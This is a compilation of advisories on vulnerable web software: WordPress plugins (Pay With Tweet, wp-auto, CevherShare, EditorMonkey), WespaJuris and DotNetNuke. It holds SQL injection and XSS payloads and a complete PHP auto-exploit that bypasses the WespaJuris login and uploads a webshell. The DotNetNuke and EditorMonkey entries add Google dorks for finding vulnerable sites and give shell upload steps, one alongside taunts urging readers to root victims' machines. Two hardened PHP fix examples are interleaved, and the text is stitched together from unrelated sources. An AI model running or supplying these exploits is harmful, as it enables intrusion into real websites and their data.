WordPress plugin Pay With Tweet <= 1.1 multiple vulnerabilities and fixes: vulnerability alert (compilation of 8 advisories)
Title: Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities
Author: Gianluca Brindisi (gATbrindi.si @gbrindisi brindi.si/g/)
Download: downloads.wordpress.org/plugin/pay-with-tweet.1.1.zip
Affected version: 1.1
1) Blind SQL Injection in shortcode:
Short code parameter 'id' is prone to blind sqli,
you need to be able to write a post/page to exploit this:
[paywithtweet id="1' AND 1=2"]
[paywithtweet id="1' AND 1=1"]
2) Multiple XSS in pay.php
[host]/wp-content/plugins/pay-with-tweet/pay.php
After connecting to twitter:
?link=%22>[XSS]
After submitting the tweet:
?title=[XSS]&dl=[REDIRECT-TO-URL]%27)">[XSS]
The final download link will be replaced with [REDIRECT-TO-URL]
POC: pay.php?link=%22>&title=&dl=brindi.si%27">
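A hardened way of rendering the title and dl parameters above, added here as an illustration and not taken from the plugin: each value is output-encoded for the context it lands in, nothing is interpolated into an inline handler, and the download target is restricted to the site's own host so it cannot be turned into a redirect. The function names, the site host and the markup are assumptions.

```php
<?php
// Added example, not the plugin's code: pay.php-style parameters rendered safely.
// Function names, the site host and the markup are assumptions for illustration.

// Accept only http/https URLs on our own host as a download/redirect target.
function safe_download_target(string $dl, string $site_host): string {
    $p = parse_url($dl);
    if ($p === false || empty($p['scheme']) || empty($p['host'])) {
        return '';                                   // relative or malformed: drop it
    }
    if (!in_array(strtolower($p['scheme']), ['http', 'https'], true)) {
        return '';                                   // javascript:, data:, ...
    }
    if (strcasecmp($p['host'], $site_host) !== 0) {
        return '';                                   // off-site target: no open redirect
    }
    return $dl;
}

// Encode for HTML attribute/text context; "> and ') sequences become inert text.
function attr(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Build the post-tweet download link from the request parameters.
function render_download_link(array $params, string $site_host): string {
    $dl = safe_download_target((string) ($params['dl'] ?? ''), $site_host);
    if ($dl === '') {
        return '<p>No valid download link.</p>';
    }
    $title = (string) ($params['title'] ?? 'Download');
    // A plain href needs no JavaScript quoting, so there is no second context to escape for.
    return '<a href="' . attr($dl) . '">' . attr($title) . '</a>';
}

// Constructed inputs shaped like the advisory's payloads (not real sites).
echo render_download_link(['title' => '"><svg>', 'dl' => 'https://attacker.example/x\')">'], 'shop.example'), "\n";
echo render_download_link(['title' => 'My e-book', 'dl' => 'https://shop.example/files/book.pdf'], 'shop.example'), "\n";
```

The first call yields the fallback paragraph because the host is not ours; the second yields a link whose title text is entity-encoded.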
Title: WordPress wp-auto plugin Blind SQL Injection Vulnerability
Author: longrifle0x
Software: WordPress
Download: wordpress.org/extend/plugins/wp-auto/
Testing tool: SQLMAP
Overview
The WordPress plugin wp-auto was found to have a blind SQL injection issue.
File:
wp-content/plugins/wp-auto/modules/index.php
Test method: id=-1; or 1=if
Test
[host]/wp-content/plugins/wp-auto/modules/index.php[GET][id=-1][CURRENT_USER
[host]/wp-content/plugins/wp-auto/modules/index.php[GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)
[host]/wp-content/plugins/wp-auto/modules/index.php[GET][id=-1][MID((VERSION()),1,6)
Fix
Filter the parameter input on the page wp-content/plugins/wp-auto/modules/index.php.
/*
# Title: WespaJuris <= 3.0 auto exploit
# Author: WhiteCollarGroup
# Website: www.wespadigital.com.br/
# Download: www.wespadigital.com.br/download/wespajuris_v3_0_.rar
# Affected version: 3.0
# Tested on: Apache Server
WespaJuris is a software for law firms.
Use this exploit to upload a webshell on vulnerable applications.
Usage:
php exploit.php
示例
$ php exploit.php
WespaJuris <= 3.0 exploit
Coded by WhiteCollarGroup
Type Ctrl + C for exit
Try "php exploit.php /about" for get info
[?] Target address (login form):
www.xxx.com/juris/
[?] Webshell path (in your computer):
C:\wamp\www\webshell.php
[*] Login...
[*] Trying to add php on allowed file formats.
[*] Adding a new client.
[*] Getting new client ID
[!] Client ID: 30
[*] Adding a new process.
[*] Getting new process ID.
[!] New process ID: 37
[*] Adding new task.
[*] Getting new task ID
[*] New task ID: 16
[*] Adding new doc type.
[*] Trying to get new doc type ID.
[!] New doc type ID: 7
[*] Trying to upload file...
[*] Thinking about file address...
[!] Exploit complete.
[i] You have now a webshell in
Then, go to localhost/juris/clientdir/30/dl/webshell.php and see your webshell.
:: How does this exploit work? Manual steps.
~> Login bypass
On login form, enter "SQLi strings":
Login: ' or 1=1-- wc
Pass: wcgroup
~> Configure file formats
Go to “CONFIGURAÇÕES”.
In “Extensões de documentos”, add “php”.
BEGIN Do it only if the system is blank
~> Add new client
Go to “CLIENTES E USUÁRIOS” > “adicionar”.
Add your own user.
~> Add new process
Go to “PROCESSOS” > “adicionar”.
Add your own process.
~> Add new task
Go to “PROCESSOS”.
Click on the process that you've created.
In “Tarefas”, click “Adicionar”.
~> Add new document type
Go to “DOCUMENTOS”.
Click “ADICIONAR/EDITAR TIPO DOCUMENTO”.
In “Adicionar Tipo de Documento” form, type anything and then, click “Adicionar”.
END Do it only if the system is blank
~> Get arbitrary file upload
Go to “DOCUMENTOS”.
Click “ADICIONAR DOCUMENTO”.
In “Título”, select a client and a process. Click “PROSSEGUIR”.
Select a task in “TAREFAS”, a document type in “Escolha um Tipo”.
In “Título do documento”, type anything.
Upload the file in “Subir arquivo do Documento”. Leave “Link para Documento na Internet” empty.
Click “Adicionar Novo Documento”.
Click “DOCUMENTOS” and click on your webshell.
*/
set_time_limit(0);
echo "WespaJuris <= 3.0 auto exploit\n";
echo "Coded by WhiteCollarGroup\n";
echo "Type Ctrl + C for exit\n";
if((isset($argv[1])) AND ($argv[1]=="/about")) {
    echo "WhiteCollarGroup\nwww.xxx.com\nwhitecollar_group@hotmail.com\nTwitter/Facebook/Blogspot: WCollarGroup\nirc.virtualife.com.br #wcgroup\n\n";
    exit;
} else {
    echo "Try \"php $argv[0] /about\" for get info\n";
}
echo "\n";
if(!function_exists("curl_init")) {
    echo "PHP CURL was not found on this system.\n";
    echo "Linux(Debian-like apt system): Type the following command on shell:\n";
    echo "# apt-get install php5-curl\n\n";
    echo "Unix: Edit your file php.ini and remove \";\" from following line:\n";
    echo ";extension=curl.so\n\n";
    echo "Windows: Edit your file php.ini and remove \";\" from following line:\n";
    echo ";extension=php_curl.dll\n\n";
    echo "Read more: www.php.net/manual/book.curl.php\n\n";
    exit;
}
puts("Target address (login form):", "[?]");
$target = trim(fgets(STDIN));
// normalise the base URL: drop a trailing index.php and a trailing slash
$target = preg_replace("/index\.php$/", "", $target);
$target = preg_replace("/\/$/", "", $target);
puts("Webshell path (in your computer):", "[?]");
do {
    $webshell = trim(fgets(STDIN));
    if(!file_exists($webshell)) echo "File not found!";
} while(!file_exists($webshell));
$ch = curl_init();
// login (the same session handle and cookie jar are reused for every request)
puts("Login...");
curl_setopt($ch, CURLOPT_URL, $target."/process_login.php");
curl_setopt($ch, CURLOPT_REFERER, $target);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "do=login&username=".urlencode("' or 1=1-- wc")."&password=wcgroup");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/0725 Firefox/2.0.0.6");
curl_setopt($ch, CURLOPT_TIMEOUT, 60);
curl_setopt($ch, CURLOPT_COOKIEJAR, "wcgroup.txt");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$store = curl_exec($ch);
if(preg_match("/Dados de acesso incorretos, por favor tente novamente/", $store)) {
    puts("Could not login.", "[-]");
    echo "Make sure that the server uses a vulnerable version of WespaJuris.\n";
    exit;
}
// config file format
$parts = explode(".", $webshell);
$ext = end($parts);
puts("Trying to add $ext on allowed file formats.");
curl_setopt($ch, CURLOPT_URL, $target."/admin/main.php?pg=settings");
curl_setopt($ch, CURLOPT_POSTFIELDS, "task=defsideset&new_serverdiff=0&new_dateformat=".urlencode("%Y/%c/%e")."&new_extensions=".urlencode("$ext,php,jpg,jpeg,gif,png,psd,zip,ai,pdf,doc"));
curl_exec($ch);
// add client
puts("Adding a new client.");
curl_setopt($ch, CURLOPT_URL, $target."/admin/main.php?pg=addclient");
curl_setopt($ch, CURLOPT_POSTFIELDS, "task=addclient&company=WhiteCollarGroup&address1=www.wcgroup.host56.com&address2=whitecollar_group%40hotmail.com&city=%40WCollarGroup&state=facebook.com%2FWCollarGroup&zip=wcollargroup.blogspot.com&country=irc.virtualife.com.br+%23wcgroup&phone=WCGroup&phone_alt=This+was+a+auto+exploit&fax=We+did+not+hack+your+website");
curl_exec($ch);
// get user ID (read the new client's id back from the client <select> on the add-files page; option markup assumed)
puts("Getting new client ID");
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_URL, $target."/admin/main.php?pg=addfiles");
$store = curl_exec($ch);
$numbers = array();
preg_match_all("/<option value=\"([0-9]+)\">WhiteCollarGroup<\/option>/", $store, $numbers);
$uid = $numbers[1][0];
puts("Client ID: $uid", "[!]");
// add process
puts("Adding a new process.");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_URL, $target."/admin/main.php?pg=addproj");
curl_setopt($ch, CURLOPT_POSTFIELDS, "task=addproject&client_id=".$uid."&project_title=HackMySite&description=WCGroup+did+not+hacked+your+website.%0D%0AWCGroup+only+wrote+the+exploit+for+this+CMS+and+did+public+release.&startdate=08%2F06%2F2012&startdate_Month=7&miledate=08%2F06%2F2999&miledate_Month=7&findate=&findate_Month=&cost=0.00&status=Arquivado");
$store = curl_exec($ch);
// get process ID
puts("Getting new process ID.");
$numbers = array();
preg_match_all("/main\.php\?pg=projperms&pid=([0-9]*)/", $store, $numbers);
$pid = $numbers[1][0];
puts("New process ID: $pid", "[!]");
// add task
puts("Adding new task.");
curl_setopt($ch, CURLOPT_URL, $target."/admin/main.php?pg=addtask");
curl_setopt($ch, CURLOPT_POSTFIELDS, "task=addtask&clid=$uid&pid=$pid&client_id=main.php%3Fpg%3Daddtask%26clid%3D$uid&pid=$pid&task_title=Hacked+site&description=Sorry%2C+admin.&startdate=08%2F06%2F2012&startdate_Month=7&miledate=08%2F06%2F2999&miledate_Month=7&findate=&findate_Month=&status=Em+andamento&notes=Check+www.wcgroup.host56.com+for+details&tuid=0");
$store = curl_exec($ch);
// get task id
puts("Getting new task ID");
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_URL, $target."/admin/main.php?pg=proj&clid=$uid&pid=$pid");
$store = curl_exec($ch);
$numbers = array();
preg_match_all("/main\.php\?pg=edittask&clid=$uid&pid=$pid&tid=([0-9]*)/", $store, $numbers);
$taskid = $numbers[1][0];
puts("New task ID: $taskid");
// add doc type
puts("Adding new doc type.");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_URL, $target."/admin/main.php?pg=filetypes");
curl_setopt($ch, CURLOPT_POSTFIELDS, "task=addfiletype&file_type=hack");
curl_exec($ch);
// get doc type id
puts("Trying to get new doc type ID.");
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_URL, $target."/admin/main.php?pg=filetypes");
$store = curl_exec($ch);
$numbers = array();
preg_match_all("/main\.php\?pg=filetypes&task=deltype&type_id=([0-9]*)/", $store, $numbers);
$tid = $numbers[1][0];
puts("New doc type ID: $tid", "[!]");
// upload file
puts("Trying to upload file...");
curl_setopt($ch, CURLOPT_POST, 1);
$post = array(
    "task" => "addfile",
    "client_id" => $uid,
    "from" => "step1",
    "project_id" => $pid,
    "clid" => $uid,
    "task_id" => $taskid,
    "type_id" => $tid,
    "file_title" => "wcgroup",
    "file" => "@$webshell"   // legacy "@path" multipart upload syntax (PHP < 5.5)
);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_exec($ch);
// make file address
puts("Thinking about file address...");
$fileaddr = $target."/clientdir/$uid/dl/".basename($webshell);
puts("Exploit complete.", "[!]");
puts("You have now a webshell in <$fileaddr>", "[i]");
// print a status line with the given prefix, defaulting to "[*]"
function puts($str, $prefix=false) {
    if(!$prefix) $prefix = "[*]";
    echo $prefix." ".$str."\n";
}
Affected version: DotNetNuke 5.x
Other versions may also be affected.
[+] Application: DotNetNuke
[+] Affected Version: version prior to 5.x
[+] Vendor’s URL: www.dotnetnuke.com/
[+] Bug Type: Privilege escalation, Unauthorized access, Remote
[+] Risk Level: High
[+] No-exploit is required to make it easier than what it is..
[+] DotNetNuke Remote File Upload Vulnerability
[+] Add/User Account Security Failure Vulnerability
[+] Unauthorized Full access to the Server! :)
[+] Unauthorized Full access to the Files and Database!
[+] It Could Be Failure to revalidate file and folder permissions correctly for uploads.
[-*-] Quick Note:
[-] Vulnerability Details: DO NOT be a zone h lamer! just try to be more effective spread your shit
And hunt more idiots and root their machines! then hit them in the middle of nowhere by Saying
“Ph33r”
Access the upload panel. Just dork: "inurl:ajaxfbs/browser.html"
Demo:
[1] [host]/tramways/DesktopModules/FeedbackDesigner/ajaxfbs/browser.html
Aspx Shell with New user Privilege
[host]/aspx.aspx
Password: admin
[2] [host]/DesktopModules/FlashSlide/ajaxfbs/browser.html
Aspx Shell with New user Privilege
[host]/aspx.aspx
Password: admin
[3] [host]/DeskTopModules/Complete%20Feedback%20Designer/ajaxfbs/browser.html
Aspx Shell with New user Privilege
[host]/aspx.aspx
Password: admin
Fix:
[*_*] The thanx belongs to the masters! Islamic Ghosts Team :)
Affected version: WordPress CevherShare 2.0 plugin
Developer: phpkode.com/
Download: phpkode.com/download/s/cevhershare.zip
Tested on: Ubuntu-Linux
Vulnerable code page: cevhershare/cevhershare-admin.php
Test:
[host]/wp-content/plugins/cevhershare/cevhershare-admin.php?id=[SQL-Injection]
// vulnerable code: request parameters are taken as-is, with no type check or escaping
$id = $_GET['id'] ? $_GET['id'] : $_POST['id'];
$pos = $_GET['pos'] ? $_GET['pos'] : $_POST['pos'];
$status = $_GET['status'] ? $_GET['status'] : $_POST['status'];
$task = $_GET['t'] ? $_GET['t'] : $_POST['t'];
$do = $_POST['do'];
if($do == "update-lang"){
$uplang = $_POST['update-lang'];
update_option('cevhershare_language',$uplang);
}
// $id is interpolated straight into the query: the injection point
if($id) $item = $wpdb->get_row("SELECT * FROM ".$wpdb->prefix."cevhershare WHERE id=$id");
// every POST field below is concatenated into SQL unescaped
if($do == 'update') $wpdb->query("UPDATE ".$wpdb->prefix."cevhershare SET enabled='".$_POST['enabled']."', position='".$_POST['position']."', name='".$_POST['name']."', big='".$_POST['big']."', small='".$_POST['small']."' WHERE id='$id'");
elseif($do == 'add') $wpdb->query("INSERT INTO ".$wpdb->prefix."cevhershare (position, name, big, small) VALUES('".$_POST['position']."','".$_POST['name']."', '".$_POST['big']."', '".$_POST['small']."')");
elseif($do == 'delete') $wpdb->query("DELETE FROM ".$wpdb->prefix."cevhershare WHERE id=$id LIMIT 1");
elseif($do == 'reset') cevhershare_reset;
elseif($do == 'settings'){
Fix: filter the inputs.
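A hardened version of the handlers above, added here as an illustration and not taken from the plugin: the id is cast to an integer, every value reaches the database through $wpdb placeholders, and state changes require a capability and a nonce. The same integer cast plus placeholder pattern is the fix for the Pay With Tweet shortcode id and the wp-auto id parameter earlier on this page. The function name, nonce action and capability are assumptions; it assumes it runs inside WordPress.

```php
<?php
// Added example (not the plugin's code): the CevherShare admin handlers rewritten
// with an integer-cast id, $wpdb placeholders, a capability check and a nonce.
// Assumes it runs inside WordPress; the nonce action name is an assumption.
function cevhershare_admin_handle(): ?object {
    global $wpdb;
    $table = $wpdb->prefix . 'cevhershare';

    // Fail closed: only users who may manage options reach the handlers.
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient privileges.');
    }

    // absint(): "1' AND 1=1" becomes 1, so no query text can ride in on id.
    $id = isset($_REQUEST['id']) ? absint($_REQUEST['id']) : 0;
    $do = isset($_POST['do']) ? (string) $_POST['do'] : '';
    if ($do !== '') {
        check_admin_referer('cevhershare_admin');   // CSRF check for state changes
    }

    // Field sanitizers: plain text for names/positions, URL syntax for icon links.
    $text = static fn($k) => sanitize_text_field(wp_unslash($_POST[$k] ?? ''));
    $url  = static fn($k) => esc_url_raw(wp_unslash($_POST[$k] ?? ''));

    if ($do === 'update' && $id) {
        $wpdb->update($table,
            ['enabled' => absint($_POST['enabled'] ?? 0), 'position' => $text('position'),
             'name' => $text('name'), 'big' => $url('big'), 'small' => $url('small')],
            ['id' => $id], ['%d', '%s', '%s', '%s', '%s'], ['%d']);
    } elseif ($do === 'add') {
        $wpdb->insert($table,
            ['position' => $text('position'), 'name' => $text('name'),
             'big' => $url('big'), 'small' => $url('small')],
            ['%s', '%s', '%s', '%s']);
    } elseif ($do === 'delete' && $id) {
        $wpdb->delete($table, ['id' => $id], ['%d']);   // formats quote the values
    }

    // Row lookup for the edit form: a %d placeholder, never string interpolation.
    return $id ? $wpdb->get_row($wpdb->prepare("SELECT * FROM {$table} WHERE id = %d", $id)) : null;
}
```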
It is really just an FCKeditor hole, but with a condition: the EditorMonkey plugin has to be installed.
Heh.
xxxx.com/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html
upload shell.php.jpg
xxxx.com//UserFiles/shell.php.jpg
The WordPress plugin EditorMonkey has an upload vulnerability; those running it on Windows take note.
This is the FCKeditor upload hole, so there is no need to explain it again; everyone knows it well. The built-in editor is still the safer choice.
Vulnerability test:
www.tmdsb.com/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html
What file to upload, everyone already knows.
After upload the file is at www.tmdsb.com/UserFiles/tmdsb.txt
A Google search shows plenty of blogs using this plugin.
Keyword: wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html
editormonkey is a WordPress back-end editor plugin.
It was published on inj3ct0r several days ago and has been reposted since; personally I don't think it is very polished.
All of them just upload directly and end up with an x.php.jpg shell.
With the FCKeditor 0day you could get a PHP shell directly.
GOOGLE dork: inurl:"plugins/editormonkey"
EXP:
Upload a new file: